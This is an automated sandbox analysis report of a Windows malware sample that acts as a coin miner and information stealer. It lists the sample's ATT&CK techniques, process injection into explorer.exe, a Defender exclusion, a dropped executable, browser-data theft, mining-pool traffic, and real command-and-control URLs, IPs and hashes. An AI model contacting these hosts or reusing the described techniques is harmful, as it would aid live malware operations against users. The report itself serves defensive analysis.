                        Source: Yara matchFile source: 0.2.file.exe.7c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000000.2115394584.00000000007F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.2116236371.0000000002801000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2119261652.0000000002800000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: file.exe PID: 4152, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5020, type: MEMORYSTR

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                        Windows Management Instrumentation                        		1
                        DLL Side-Loading                        		1
                        Exploitation for Privilege Escalation                        		1
                        Disable or Modify Tools                        		2
                        OS Credential Dumping                        		2
                        System Time Discovery                        		Remote Services1
                        Archive Collected Data                        		2
                        Ingress Tool Transfer                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts22
                        Native API                        		11
                        Windows Service                        		1
                        DLL Side-Loading                        		1
                        Deobfuscate/Decode Files or Information                        		21
                        Input Capture                        		11
                        Account Discovery                        		Remote Desktop Protocol1
                        Data from Local System                        		21
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts1
                        Exploitation for Client Execution                        		Logon Script (Windows)11
                        Windows Service                        		2
                        Obfuscated Files or Information                        		2
                        Credentials In Files                        		2
                        File and Directory Discovery                        		SMB/Windows Admin Shares21
                        Input Capture                        		1
                        Non-Standard Port                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts2
                        Command and Scripting Interpreter                        		Login Hook612
                        Process Injection                        		1
                        DLL Side-Loading                        		NTDS126
                        System Information Discovery                        		Distributed Component Object ModelInput Capture3
                        Non-Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud Accounts1
                        Service Execution                        		Network Logon ScriptNetwork Logon Script1
                        File Deletion                        		LSA Secrets351
                        Security Software Discovery                        		SSHKeylogging114
                        Application Layer Protocol                        		Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        Modify Registry                        		Cached Domain Credentials131
                        Virtualization/Sandbox Evasion                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items131
                        Virtualization/Sandbox Evasion                        		DCSync13
                        Process Discovery                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job612
                        Process Injection                        		Proc Filesystem1
                        Application Window Discovery                        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                        System Owner/User Discovery                        		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1570971 Sample: file.exe Startdate: 08/12/2024 Architecture: WINDOWS Score: 100 62 woo097878781.win 2->62 64 pool.hashvault.pro 2->64 72 Suricata IDS alerts for network traffic 2->72 74 Found malware configuration 2->74 76 Malicious sample detected (through community Yara rule) 2->76 78 8 other signatures 2->78 10 file.exe 3 1 2->10         started        signatures3 process4 signatures5 102 Found evasive API chain (may stop execution after checking mutex) 10->102 104 Contains functionality to inject code into remote processes 10->104 106 Adds a directory exclusion to Windows Defender 10->106 108 4 other signatures 10->108 13 explorer.exe 2 3 10->13         started        18 cmd.exe 1 10->18         started        process6 dnsIp7 68 woo097878781.win 154.216.20.243, 443, 49707, 49708 SKHT-ASShenzhenKatherineHengTechnologyInformationCo Seychelles 13->68 70 185.157.162.216, 49709, 49711, 49714 OBE-EUROPEObenetworkEuropeSE Sweden 13->70 60 C:\ProgramData\...\WindosCPUsystem.exe, PE32+ 13->60 dropped 110 System process connects to network (likely due to code injection or exploit) 13->110 112 Benign windows process drops PE files 13->112 114 Found evasive API chain (may stop execution after checking mutex) 13->114 118 5 other signatures 13->118 20 WindosCPUsystem.exe 1 1 13->20         started        24 explorer.exe 13->24         started        26 explorer.exe 13->26         started        28 explorer.exe 13->28         started        116 Adds a directory exclusion to Windows Defender 18->116 30 powershell.exe 23 18->30         started        32 conhost.exe 18->32         started        file8 signatures9 process10 file11 58 C:\Users\user\AppData\...\ggbfqxmgkimt.sys, PE32+ 20->58 dropped 88 Protects its processes via BreakOnTermination flag 20->88 90 Injects code into the Windows Explorer (explorer.exe) 20->90 92 Uses powercfg.exe to modify the power settings 20->92 100 4 other signatures 20->100 34 explorer.exe 20->34         started        38 powershell.exe 23 20->38         started        40 cmd.exe 1 20->40         started        42 9 other processes 20->42 94 System process connects to network (likely due to code injection or exploit) 24->94 96 Tries to harvest and steal browser information (history, passwords, etc) 26->96 98 Loading BitLocker PowerShell Module 30->98 signatures12 process13 dnsIp14 66 37.203.243.102, 3333, 49773 DAPLDATAPLANETLtdRU Russian Federation 34->66 80 System process connects to network (likely due to code injection or exploit) 34->80 82 Query firmware table information (likely to detect VMs) 34->82 84 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 34->84 86 Loading BitLocker PowerShell Module 38->86 44 conhost.exe 38->44         started        46 conhost.exe 40->46         started        48 wusa.exe 40->48         started        50 conhost.exe 42->50         started        52 conhost.exe 42->52         started        54 conhost.exe 42->54         started        56 6 other processes 42->56 signatures15 process16

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        file.exe100%Joe Sandbox ML

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Local\Temp\ggbfqxmgkimt.sys5%ReversingLabs

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        https://woo097878781.win/66/api/endpoint.phpQ=C0%Avira URL Cloudsafe
                        https://woo097878781.win:443/WindosCPUsystem.exeD9D0%Avira URL Cloudsafe
                        https://woo097878781.win/64.EXEhttps://woo097878781.win/upload.php66Mozilla/5.00%Avira URL Cloudsafe
                        https://woo097878781.win/66/api/endpoint.phpK0%Avira URL Cloudsafe
                        https://woo097878781.win/32.EXEhttps://woo097878781.win/64.EXEhttps://woo097878781.win/upload.php66M0%Avira URL Cloudsafe
                        https://woo097878781.win/U0%Avira URL Cloudsafe
                        https://woo097878781.win/Z0%Avira URL Cloudsafe
                        https://woo097878781.win/WindosCPUsystem.exeWindowsSystem10%Avira URL Cloudsafe
                        https://woo097878781.win/WindosCPUsystem.exe0%Avira URL Cloudsafe
                        https://woo097878781.win/66/api/endpoint.php0%Avira URL Cloudsafe
                        https://woo097878781.win/WindosCPUsystem.exeWindowsSystem1WindosCPUsystem.exe0%Avira URL Cloudsafe
                        https://woo097878781.win/ra0%Avira URL Cloudsafe
                        https://woo097878781.win0%Avira URL Cloudsafe
                        https://woo097878781.win/i0%Avira URL Cloudsafe
                        https://woo097878781.win/upload.php0%Avira URL Cloudsafe
                        https://woo097878781.winPTt0%Avira URL Cloudsafe
                        https://woo097878781.win/32.EXE0%Avira URL Cloudsafe
                        https://woo097878781.win/qS0%Avira URL Cloudsafe
                        https://woo097878781.win/r0%Avira URL Cloudsafe
                        https://woo097878781.win/0%Avira URL Cloudsafe
                        https://woo097878781.win/p0%Avira URL Cloudsafe
                        https://woo097878781.win:443/upload.php0%Avira URL Cloudsafe
                        https://woo097878781.win/v0%Avira URL Cloudsafe
                        https://woo097878781.win/WindosCPUsystem.exey0%Avira URL Cloudsafe
                        https://woo097878781.win/66/api/endpoint.php--cinit-version=3.4.1--tls--cinit-idle-wait=5--cinit-idl0%Avira URL Cloudsafe
                        https://woo097878781.win:443/64.EXE0%Avira URL Cloudsafe
                        https://woo097878781.win/66/api/endpoint.php1=0%Avira URL Cloudsafe
                        https://woo097878781.win/upload.php30%Avira URL Cloudsafe
                        https://woo097878781.win/64.EXE0%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        pool.hashvault.pro
                        		5.188.137.200
                        		truefalse
                          		high
                          woo097878781.win
                          		154.216.20.243
                          		truetrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://woo097878781.win/WindosCPUsystem.exetrue
                            • Avira URL Cloud: safe
                            		unknown
                            https://woo097878781.win/66/api/endpoint.phptrue
                            • Avira URL Cloud: safe
                            		unknown
                            https://woo097878781.win/upload.phptrue
                            • Avira URL Cloud: safe
                            		unknown
                            https://woo097878781.win/64.EXEtrue
                            • Avira URL Cloud: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://x1.i.lencr.org/explorer.exe, 00000020.00000003.3390678126.0000000002C29000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://woo097878781.win:443/WindosCPUsystem.exeD9Dexplorer.exe, 00000004.00000003.2234164355.0000000000ACB000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://r11.o.lencr.org0#explorer.exe, 00000020.00000003.3390678126.0000000002C2F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3390824384.0000000000739000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://woo097878781.win/64.EXEhttps://woo097878781.win/upload.php66Mozilla/5.0file.exe, 00000000.00000003.2116236371.0000000002875000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://woo097878781.win/66/api/endpoint.phpQ=Cexplorer.exe, 00000020.00000003.2443389912.0000000000739000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://woo097878781.win/WindosCPUsystem.exeWindowsSystem1explorer.exe, 00000004.00000003.3104820467.0000000002EEF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3772296676.0000000002EEE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4654526763.0000000002EDF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3044272983.0000000002EEF000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://woo097878781.win/32.EXEhttps://woo097878781.win/64.EXEhttps://woo097878781.win/upload.php66Mfile.exefalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://x1.i.lencr.org/3Rexplorer.exe, 00000020.00000003.3390678126.0000000002C29000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://woo097878781.win/66/api/endpoint.phpKexplorer.exe, 00000020.00000002.4653016535.0000000000699000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://woo097878781.win/Uexplorer.exe, 00000021.00000003.2875477141.000000000385D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2887715751.000000000385D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2885657484.000000000385D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://woo097878781.win/Zexplorer.exe, 00000004.00000003.2270189206.0000000000B4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://x1.c.lencr.org/explorer.exe, 00000020.00000003.3390678126.0000000002C2F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.4654016391.0000000002C28000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3390678126.0000000002C29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3768810420.0000000002C2F000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://woo097878781.winexplorer.exe, 00000020.00000003.2443389912.0000000000739000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://woo097878781.win/WindosCPUsystem.exeWindowsSystem1WindosCPUsystem.exefile.exefalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://r11.i.lencr.org/0explorer.exe, 00000020.00000003.3390678126.0000000002C2F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3390824384.0000000000739000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://woo097878781.win/raexplorer.exe, 00000021.00000003.2875477141.000000000385D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2887715751.000000000385D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2885657484.000000000385D000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://woo097878781.win/explorer.exe, 00000004.00000003.2270189206.0000000000B4C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2875477141.000000000385D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2887715751.000000000385D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2885657484.000000000385D000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://woo097878781.win/iexplorer.exe, 00000021.00000003.2875477141.000000000385D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2887715751.000000000385D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2885657484.000000000385D000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://woo097878781.win/32.EXEfile.exefalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://x1.c.lencr.org/0explorer.exe, 00000020.00000003.3390678126.0000000002C2F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3390756248.0000000002C39000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://x1.i.lencr.org/0explorer.exe, 00000020.00000003.3390678126.0000000002C2F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3768810420.0000000002C50000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3390756248.0000000002C50000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3390756248.0000000002C39000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://woo097878781.win/qSexplorer.exe, 00000021.00000002.2886931990.0000000001183000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://woo097878781.winPTtexplorer.exe, 00000020.00000003.2443389912.0000000000739000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://woo097878781.win/rexplorer.exe, 00000021.00000003.2875477141.000000000385D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2887715751.000000000385D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2885657484.000000000385D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://woo097878781.win:443/upload.phpexplorer.exe, 00000021.00000003.2847225481.000000000121B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2887033059.000000000121B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2847508835.000000000121B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2886931990.00000000011A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://woo097878781.win/pexplorer.exe, 00000004.00000003.2234164355.0000000000AD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://woo097878781.win/vexplorer.exe, 00000004.00000003.2396889180.0000000000B4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://woo097878781.win:443/64.EXEexplorer.exe, 00000004.00000003.3101400503.0000000000B47000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4653721171.0000000000B48000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2396889180.0000000000B4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://woo097878781.win/66/api/endpoint.php--cinit-version=3.4.1--tls--cinit-idle-wait=5--cinit-idlexplorer.exe, 00000020.00000002.4653016535.00000000006D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://woo097878781.win/WindosCPUsystem.exeyexplorer.exe, 00000004.00000003.2234164355.0000000000AD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://woo097878781.win/66/api/endpoint.php1=explorer.exe, 00000020.00000003.2475407656.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3390824384.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2443389912.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.4653016535.000000000072C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2475569173.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3768529697.000000000072C000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://x1.c.lencr.org/=explorer.exe, 00000020.00000003.3768810420.0000000002C50000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3390756248.0000000002C50000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://woo097878781.win/upload.php3explorer.exe, 00000021.00000003.2847225481.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2887033059.0000000001240000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            37.203.243.102
                                            		unknownRussian Federation
                                            		44964DAPLDATAPLANETLtdRUtrue
                                            185.157.162.216
                                            		unknownSweden
                                            		197595OBE-EUROPEObenetworkEuropeSEtrue
                                            154.216.20.243
                                            		woo097878781.winSeychelles
                                            		135357SKHT-ASShenzhenKatherineHengTechnologyInformationCotrue

                                            General Information

                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1570971
                                            Start date and time:2024-12-08 15:06:08 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 10m 19s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:37
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:file.exe
                                            Detection:MAL
                                            Classification:mal100.troj.spyw.expl.evad.mine.winEXE@53/12@2/3
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HCA Information:
                                            • Successful, ratio: 99%
                                            • Number of executed functions: 91
                                            • Number of non-executed functions: 288
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                                            Warnings

                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                            • Report size getting too big, too many NtCreateKey calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                            • VT rate limit hit for: file.exe

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            09:07:02API Interceptor29x Sleep call for process: powershell.exe modified
                                            09:07:28API Interceptor1x Sleep call for process: WindosCPUsystem.exe modified
                                            09:07:32API Interceptor327x Sleep call for process: explorer.exe modified
                                            15:07:01Task SchedulerRun new task: WindowsServer2024 path: "C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe" s>{741330C7-73F4-49B6-9258-6679317DED46}

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            37.203.243.102lokigod.exeGet hashmaliciousXmrigBrowse
                                              xblkpfZ8Y4.exeGet hashmaliciousXmrigBrowse
                                                154.216.20.243https://zillow-online.com/realestate/one/drive/docs/Get hashmaliciousHTMLPhisherBrowse
                                                  https://zillow-online.com/realestate/one/drive/docs/Get hashmaliciousHTMLPhisherBrowse
                                                    https://estacionar-replonline.net/galicia/?fbclid=PAZXh0bgNhZW0BMAABpjGet hashmaliciousUnknownBrowse

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      pool.hashvault.prolokigod.exeGet hashmaliciousXmrigBrowse
                                                      • 37.203.243.102
                                                      xblkpfZ8Y4.exeGet hashmaliciousXmrigBrowse
                                                      • 5.188.137.200
                                                      0kToM9fVGQ.exeGet hashmaliciousXmrigBrowse
                                                      • 45.76.89.70
                                                      prog.exeGet hashmaliciousXmrigBrowse
                                                      • 95.179.241.203
                                                      bypass.exeGet hashmaliciousXmrigBrowse
                                                      • 95.179.241.203
                                                      loader.exeGet hashmaliciousXmrigBrowse
                                                      • 142.202.242.43
                                                      7K5DrSyL8Y.exeGet hashmaliciousXmrigBrowse
                                                      • 45.76.89.70
                                                      eshkere.batGet hashmaliciousXmrigBrowse
                                                      • 95.179.241.203
                                                      frik.exeGet hashmaliciousXmrigBrowse
                                                      • 95.179.241.203
                                                      Google Chrome.exeGet hashmaliciousXmrigBrowse
                                                      • 45.76.89.70

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      DAPLDATAPLANETLtdRUlokigod.exeGet hashmaliciousXmrigBrowse
                                                      • 37.203.243.102
                                                      xblkpfZ8Y4.exeGet hashmaliciousXmrigBrowse
                                                      • 37.203.243.102
                                                      v859oajfVH.elfGet hashmaliciousUnknownBrowse
                                                      • 37.203.242.178
                                                      oAUrOBvfbV.elfGet hashmaliciousMiraiBrowse
                                                      • 93.188.42.246
                                                      x86_64-20220704-2102Get hashmaliciousMiraiBrowse
                                                      • 93.188.42.210
                                                      9faoC0drSoGet hashmaliciousMiraiBrowse
                                                      • 93.188.42.249
                                                      armGet hashmaliciousMiraiBrowse
                                                      • 93.188.42.224
                                                      eqqFDsQ1JqGet hashmaliciousMiraiBrowse
                                                      • 93.188.42.241
                                                      QeykTlqE4SGet hashmaliciousMiraiBrowse
                                                      • 93.188.42.232
                                                      OBE-EUROPEObenetworkEuropeSEsecondaryTask.vbsGet hashmaliciousClipboard Hijacker, MicroClip, RemcosBrowse
                                                      • 185.157.162.126
                                                      Slf.msiGet hashmaliciousClipboard Hijacker, MicroClip, RemcosBrowse
                                                      • 185.157.162.126
                                                      LauncherPred8.3.389 stablesetup.msiGet hashmaliciousClipboard Hijacker, MicroClip, RemcosBrowse
                                                      • 185.157.162.126
                                                      la.bot.arm6.elfGet hashmaliciousUnknownBrowse
                                                      • 193.183.116.8
                                                      LauncherPred8.3.37Stablesetup.msiGet hashmaliciousRemcosBrowse
                                                      • 185.157.162.126
                                                      Slf.msiGet hashmaliciousRemcosBrowse
                                                      • 185.157.162.126
                                                      HSG-IVN-2093456FIN.exeGet hashmaliciousRemcosBrowse
                                                      • 185.157.163.135
                                                      Payload 94.75.225.exeGet hashmaliciousUnknownBrowse
                                                      • 45.148.17.56
                                                      nabarm5.elfGet hashmaliciousUnknownBrowse
                                                      • 185.242.230.228
                                                      ZW_PCCE-010023024001.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                      • 193.187.91.212

                                                      JA3 Fingerprints

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC StealerBrowse
                                                      • 154.216.20.243
                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                      • 154.216.20.243
                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                      • 154.216.20.243
                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                      • 154.216.20.243
                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                      • 154.216.20.243
                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                      • 154.216.20.243
                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                      • 154.216.20.243
                                                      List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                      • 154.216.20.243
                                                      List of required items.vbsGet hashmaliciousUnknownBrowse
                                                      • 154.216.20.243
                                                      List of required items and services pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                      • 154.216.20.243

                                                      Dropped Files

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      C:\Users\user\AppData\Local\Temp\ggbfqxmgkimt.sysnlGOh9K5X5.exeGet hashmaliciousXmrigBrowse
                                                        LfHJdrALlh.exeGet hashmaliciousXmrigBrowse
                                                          iKvzvknzW1.exeGet hashmaliciousXmrigBrowse
                                                            2zirzlMVqX.batGet hashmaliciousXmrigBrowse
                                                              DM6vAAgoCw.exeGet hashmaliciousOrcus, XmrigBrowse
                                                                f5TWdT5EAc.exeGet hashmaliciousPhorpiex, RHADAMANTHYS, XmrigBrowse
                                                                  luQ2wBh8q6.exeGet hashmaliciousXmrigBrowse
                                                                    lokigod.exeGet hashmaliciousXmrigBrowse
                                                                      nfkciRoR4j.exeGet hashmaliciousXmrigBrowse
                                                                        File.exeGet hashmaliciousOrcus, XmrigBrowse

                                                                          Created / dropped Files

                                                                          C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe

                                                                          Download File
                                                                          Process:C:\Windows\explorer.exe
                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):2590208
                                                                          Entropy (8bit):6.512800129699833
                                                                          Encrypted:false
                                                                          SSDEEP:49152:fRyZU39fpyOe2piBq3hujaLdGvVKzbftJOKXaSBAWRrtJeE:1ZpyOx8q3hujOiVKftJOwaSeWRrB
                                                                          MD5:FD863BAB145A20D25E45177DA0E56EFC
                                                                          SHA1:ED8B0421B30B2D3783DD1A4FCDCE6E6860D7F6AD
                                                                          SHA-256:9E96BFA5E3159B7B0BEAA0C8A46A1783C900934AAE56193E26EFF8D4D85777A7
                                                                          SHA-512:9A51E4CF363349DF1E831153C107ED9CAA75E0F6536E622585BC85531C1038A24BE8FBA0EEE0D56DBBDE3D3B116163467C8F8788D89AF801F9C287CA294A6A64
                                                                          Malicious:true
                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....Tg.........."......z....'.....@..........@..............................'...........`.................................................H...<.............'.t.............'.x...............................(.......8..............P............................text...&x.......z.................. ..`.rdata..L........ ...~..............@..@.data.....&.......&.................@....pdata..t.....'......~'.............@..@.00cfg........'.......'.............@..@.tls..........'.......'.............@....reloc..x.....'.......'.............@..B................................................................................................................................................................................................................................................................................................................................................

